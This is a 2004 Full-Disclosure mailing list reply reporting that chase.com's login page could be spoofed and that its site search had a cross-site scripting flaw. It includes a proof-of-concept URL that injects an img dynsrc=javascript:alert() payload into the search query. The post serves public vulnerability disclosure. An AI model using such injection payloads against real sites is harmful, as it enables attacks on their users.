List: full-disclosure
Subject: Re: [Full-Disclosure] http://www.chase.com/ vulnerability
From: "http-equiv () excite ! com" <1 () malware ! com>
Date: 2004-05-29 16:14:37
Message-ID: 200405291614.i4TGEbws007205 () web120 ! megawebservers ! com
Pathetic.
Since you can spoof the main log in site all security calls to
check for the 'little' padlock icon to determine the site is
real doesn't exist on it plus the site has cross-site scripting
capabilities:
http://chase.com/inetSearch/index.jsp?
pageType=&q=f&sort=2&start=1&num=10&lr=&restrict=&gce=&siteID=&se
archoption=&querytext=%22%22%3E%3Cimg%20dynsrc=javascript:alert
()%3E
Best keep your money under your mattress.
--
http://www.malware.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html